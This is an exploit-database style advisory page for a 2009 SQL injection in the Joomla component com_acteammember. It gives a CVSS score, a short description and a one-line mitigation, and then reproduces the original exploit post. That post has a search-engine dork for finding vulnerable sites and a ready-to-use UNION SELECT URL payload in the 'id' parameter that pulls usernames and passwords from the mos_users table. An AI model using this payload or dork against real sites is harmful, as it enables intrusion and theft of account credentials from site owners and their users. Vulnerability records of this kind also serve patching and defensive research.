Joomla Component com_acteammember Sql Injection Vulnerability

vendor:

com_acteammember

by:

altbta

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_acteammember

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_acteammember Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the URL. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

Joomla Component com_acteammember Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
.:. Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
.:. Dork : inurl:"com_acteammember"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en


http://server/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en


####################################################################
Greats T0: aB0-3tH4b T3rR0r & RxH
Thanks T0: AtT4CKxT3rR0r1ST